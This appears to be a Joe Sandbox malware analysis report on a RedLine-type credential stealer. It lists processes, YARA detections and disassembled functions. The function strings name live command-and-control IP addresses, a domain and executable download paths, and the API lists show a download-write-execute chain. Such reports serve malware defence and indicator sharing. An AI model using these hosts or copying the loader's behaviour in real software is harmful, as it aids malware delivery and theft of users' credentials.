Start time:	10:27:40
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 2036
Imagebase:	0x640000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:27:44
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe"
Imagebase:	0x140000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:27:47
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2426494529.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.2426494529.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2426187840.00000000049F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:27:48
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:28:06
Start date:	26/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0xba0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.2426146878.0000000000FA2000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.2426146878.0000000000FA2000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	2.4%
Signature Coverage:	12.5%
Total number of Nodes:	1155
Total number of Limit Nodes:	16

Executed Functions

Function 0042676C Relevance: 51.9, APIs: 16, Strings: 13, Instructions: 1148
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00426771
WSAStartup.WS2_32(00000202,?), ref: 004273FD
socket.WS2_32(00000002,00000001,00000006), ref: 00427413
WSACleanup.WS2_32 ref: 0042742D
gethostbyname.WS2_32(00000000), ref: 00427441
htons.WS2_32(?), ref: 00427473
connect.WS2_32(00000000,?,00000010), ref: 00427484
send.WS2_32(00000000,00000000,00000000,00000000), ref: 004274A7
send.WS2_32(00000000,00000000,?,00000000), ref: 004274C3
recv.WS2_32(00000000,00000000,00000001,00000000), ref: 00427503
recv.WS2_32(?,00000000,00000001,00000000), ref: 00427681
recv.WS2_32(?,?,00000000,00000000), ref: 00427720
recv.WS2_32(?,0000000A,00000002,00000000), ref: 00427747
recv.WS2_32(00000000,?,?,00000000), ref: 004277A8
WSACleanup.WS2_32 ref: 004277E6
closesocket.WS2_32(?), ref: 004277ED

Strings

Content-Length, xrefs: 00426853, 004268ED, 004275AB
Host: , xrefs: 00426BF2, 00426C2C, 00426C43
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 , xrefs: 00426D1E, 00426FEC, 00427003
GET , xrefs: 00426AF5, 00426B17, 00426B31
User-Agent: , xrefs: 00426C73, 00426CF5, 00426D0C
(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36, xrefs: 00427015, 0042729B, 004272B2
/ping.php?substr=%s, xrefs: 0042677D
Transfer-Encoding, xrefs: 0042690B, 004269C9, 004275E7
chunked, xrefs: 004269E7, 00426A2D, 004275F8
HTTP/1.1 200 OK, xrefs: 0042678D, 0042683A, 0042754B
POST , xrefs: 00426AA7, 00426AD5, 00426B39
HTTP/1.1, xrefs: 00426B5E, 00426BBC, 00426BD3
185.172.128.228, xrefs: 0042677C

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
String ID: HTTP/1.1$(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36$/ping.php?substr=%s$185.172.128.228$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
API String ID: 791229064-1542616328
Opcode ID: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
Instruction ID: 4e55451fc037eb126e07087a8435dc815b4e607a9865e0499e256671a6cdd487
Opcode Fuzzy Hash: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
Instruction Fuzzy Hash: F39287209062E19ACB02FFB56C5659E7FF4591530D714747FE690AF393CB2C86088B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00424A0E Relevance: 48.6, APIs: 2, Strings: 25, Instructions: 1388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004265BC: __EH_prolog.LIBCMT ref: 004265C1

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 00424AD4

Part of subcall function 0042604A: __EH_prolog.LIBCMT ref: 0042604F
Part of subcall function 0042604A: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Strings

P, xrefs: 00425855
185.172.128.203, xrefs: 004255F7, 0042569D, 0042583F
/syncUpd.exe, xrefs: 004256BC, 0042573E, 0042586F
.zip, xrefs: 00425B5D, 00425B7F
P, xrefs: 004250AB
.exe, xrefs: 004258B1, 004258D3
185.172.128.228, xrefs: 00425D21, 00425DCD, 00425ED2
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 00424DB6, 00424F4C, 00424F65
sub=([\w-]{1,255}), xrefs: 00424AA2
P, xrefs: 00425EE3
185.172.128.90, xrefs: 00424FB3, 0042504D, 0042509B
185.172.128.228, xrefs: 004252C0, 00425366, 004254E5
one, xrefs: 00424B2A, 00424B45, 00424D9B
/timeSync.exe, xrefs: 0042575F, 004257F2, 00425860
P, xrefs: 004254F5
.exe, xrefs: 00425F26, 00425F48
185.172.128.59, xrefs: 0042553C, 004255D6, 0042584D
/1/Package.zip, xrefs: 00425A14, 00425AAE, 00425B08
/ping.php?substr=%s, xrefs: 00425387, 0042545D, 00425475
P, xrefs: 00425B10
\run.exe, xrefs: 00425BD0, 00425C28
/BroomSetup.exe, xrefs: 00425DE7, 00425E8D, 00425EDB
note.padd.cn.com, xrefs: 00425942, 004259FA, 00425AFF
SOFTWARE\BroomCleaner, xrefs: 004250F1, 004251E5
Installed, xrefs: 004251FF, 0042525D

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: .exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com$one$sub=([\w-]{1,255})
API String ID: 2531350358-1167600277
Opcode ID: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
Instruction ID: d125a89a0ba1aec4cd60c53361ca74c042bcd3054cac0714d62587379a507679
Opcode Fuzzy Hash: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
Instruction Fuzzy Hash: EFB2131050A2E19AC712FB7958567CA2FE49B62309F54687FE7D01F2A3CB78460C87DE

Uniqueness

Uniqueness Score: -1.00%

Function 0042628B Relevance: 12.3, APIs: 8, Instructions: 275
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 004262AD
CoCreateInstance.OLE32(00429220,00000000,00000001,00429210,?,?,?,?,?,?,?,?,?,?,?,/ping.php?substr=%s), ref: 004262C7
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00426309
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426311
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 00426338
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0042634E
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426355
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 0042637A

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString$CreateInitializeInstance
String ID:
API String ID: 3070066007-0
Opcode ID: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction ID: 83f5cca910cad30c2957a1169f386ac85e7f4b82ddc6b65933772462ec616701
Opcode Fuzzy Hash: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction Fuzzy Hash: 3A914B75A00218AFDB04DFA8D888AEEBBB9FF49314F544559F805EB241D776AC02CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004139E7 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
ExitProcess.KERNEL32 ref: 00413A21

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: 8e17948dea93fcc861bafccf52e4138581932e64e8d8508709b4de54f2ab24c4
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: 83E0B631100108ABCF21AF65DD09A993B69EF54786F444029F9869A232DB39EE92CA48

Uniqueness

Uniqueness Score: -1.00%

Function 04195BD6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 04195BFE
Module32First.KERNEL32(00000000,00000224), ref: 04195C1E

Memory Dump Source

Source File: 00000000.00000002.1991857381.0000000004195000.00000040.00000020.00020000.00000000.sdmp, Offset: 04195000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4195000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 1aead160376ba18d92d8b4caf1020e4e8f438c97b2cb5e1ec11d1a2671fd25c1
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 26F06232100711BBEB213AB5A8CDB6E76EEBF49725F100568F647A54C0DB70FC454661

Uniqueness

Uniqueness Score: -1.00%

Function 0041A242 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419F10: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

GetLastError.KERNEL32 ref: 0041A356
__dosmaperr.LIBCMT ref: 0041A35D
GetFileType.KERNEL32(00000000), ref: 0041A369
GetLastError.KERNEL32 ref: 0041A373
__dosmaperr.LIBCMT ref: 0041A37C
CloseHandle.KERNEL32(00000000), ref: 0041A39C
CloseHandle.KERNEL32(?), ref: 0041A4E6
GetLastError.KERNEL32 ref: 0041A518
__dosmaperr.LIBCMT ref: 0041A51F

Strings

H, xrefs: 0041A4A4

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
Instruction ID: 6253cfc56dbab61e205766efb0611ca8061eb8c5ebbdbf8fd01913e42387971c
Opcode Fuzzy Hash: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
Instruction Fuzzy Hash: A4A13632A041089FDF199F78D8517EE7BA1AB06324F14019EEC15EB391D7398DA2C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004192AD Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
Instruction ID: c4abe014ee414803f6a4a6dca87339887fd42b2314c6943b79fa01ee0dc397dc
Opcode Fuzzy Hash: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
Instruction Fuzzy Hash: 1CC13AB1E04249AFDB11CFA9C850BEE7BB1BF09314F04019AE954A7392C7389DC1CB69

Uniqueness

Uniqueness Score: -1.00%

Function 05BF003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 05BF024D

Strings

cess, xrefs: 05BF018D
kernel32.dll, xrefs: 05BF008F, 05BF0095

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 7ef4f0cf1756b8e1761ea360f24ffcea1b9ab0da8d164dce85f5ca966e3acfec
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 80526E74A01229DFDB64DF58C984BACBBB1BF09304F1480D9E54DA7362DB30AA95DF14

Uniqueness

Uniqueness Score: -1.00%

Function 0042615A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0042615F
RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 00426187
RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 0042620A
RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042622B

Strings

SOFTWARE\BroomCleaner, xrefs: 00426167, 0042617A
Installed, xrefs: 00426169, 00426197, 004261B6, 004261B7

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction ID: 7631ba6f6479b49e2955b4a66f7b67ea7b8ea0f8d2650bf46820f955d15f7583
Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction Fuzzy Hash: F3319A71A00129EEDF149FA8DC94AFEBB78EB08348F44016EE80277281C7B11D05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040187F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

ios_base::eofbit set, xrefs: 004018A0
ios_base::failbit set, xrefs: 0040189B, 004018D2
ios_base::badbit set, xrefs: 00401890, 004018B1

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction ID: e154b9f444e369befffee57ff699e9c141b04c4d0561678f3d19f5bf610271a8
Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction Fuzzy Hash: AEF0226280031CB7DB10BAA18C02FEA7B988F0A754F21C03BFD40361E0E77D5A0482ED

Uniqueness

Uniqueness Score: -1.00%

Function 00426510 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExA.SHELL32(?,.exe), ref: 00426552
WaitForSingleObject.KERNEL32(?,00008000), ref: 00426566
CloseHandle.KERNEL32(?), ref: 0042656F

Strings

.exe, xrefs: 0042651B

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: 8ce7cd6e21d80bec1428d2ca161df36b0ad46b5534dc267783c352d5b9ba18c9
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: 1B015A31E00218ABDF15DFA9E8459DDBBB8FF08340F418126F801A6260EB709A45CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00426242 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,0042590D,00000001,?,/ping.php?substr=%s), ref: 0042625D
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 00426275
FindCloseChangeNotification.KERNEL32(00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 0042627E

Strings

.exe, xrefs: 00426247

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID: .exe
API String ID: 3805958096-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: 1160b3d028a4f0b3eb39880a7a2cc02b481a356c14d22bba427b687e2e61c155
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: 19E06D72701224BBD7311B9AAC48FABBE6CEF86AA4F040165FB05D2110A6A1DC0197B8

Uniqueness

Uniqueness Score: -1.00%

Function 004163FD Relevance: 4.6, APIs: 3, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 00416453
GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 0041645D
__dosmaperr.LIBCMT ref: 00416488

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction ID: 375721714d43bc4782e6a43c23cd9332c59ec42f2299351a345cb8f3503d09eb
Opcode Fuzzy Hash: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction Fuzzy Hash: EA014E3360412016D6256635E8457FF67599B82738F2B017FFD188B2D2EB6CDCC2819D

Uniqueness

Uniqueness Score: -1.00%

Function 00419767 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
__dosmaperr.LIBCMT ref: 004197B1

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
Instruction ID: ffc3df5eb890e326191760c687c06a6ec256fa7eb9c4ce0b7ceac38b7dc3edc6
Opcode Fuzzy Hash: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
Instruction Fuzzy Hash: 70012D36620119ABCB159F59DC059EE7B29DF85330B28024AFC219B2D0E6749C918798

Uniqueness

Uniqueness Score: -1.00%

Function 004264F9 Relevance: 4.5, APIs: 3, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 00426502
SysFreeString.OLEAUT32(?), ref: 00426507
CoUninitialize.OLE32 ref: 00426509

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: FreeString$Uninitialize
String ID:
API String ID: 1985688103-0
Opcode ID: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction ID: 20283bebf02f6add892787a5acbccff6c180d450b55e9b59979360a618d6bcd4
Opcode Fuzzy Hash: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction Fuzzy Hash: A6B09230D02029ABEF22AB62EE0D45C7F32FF40350F410061F405332308B351D22EE88

Uniqueness

Uniqueness Score: -1.00%

Function 00419CC3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

Strings

@, xrefs: 00419D84

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: CreateFile
String ID: @
API String ID: 823142352-2766056989
Opcode ID: 19ae29186eb238c1cffb342219aeaf7137875d95b9a5eb57b690caaf41f6485a
Instruction ID: 6e2d9e324c610adb1979779f65b1bd98f37231a06814a81205b09b8777469d26
Opcode Fuzzy Hash: 19ae29186eb238c1cffb342219aeaf7137875d95b9a5eb57b690caaf41f6485a
Instruction Fuzzy Hash: 4D61E671900209AAEF259E28ECA1BFF3659DB01324F280667F914D63E1D37DCDD1C299

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081

Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

v*@, xrefs: 00401BD0

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
String ID: v*@
API String ID: 3966877926-3062513736
Opcode ID: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction ID: cee5f8951f4aa60660b8f0772aceb561b5f660f34992c4678438f01180239965
Opcode Fuzzy Hash: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction Fuzzy Hash: FC218EB1611106AFD708DF59C849A6AB7F9FF48348F14822EE116A7341C7B8DD008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042604A Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042604F

Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408

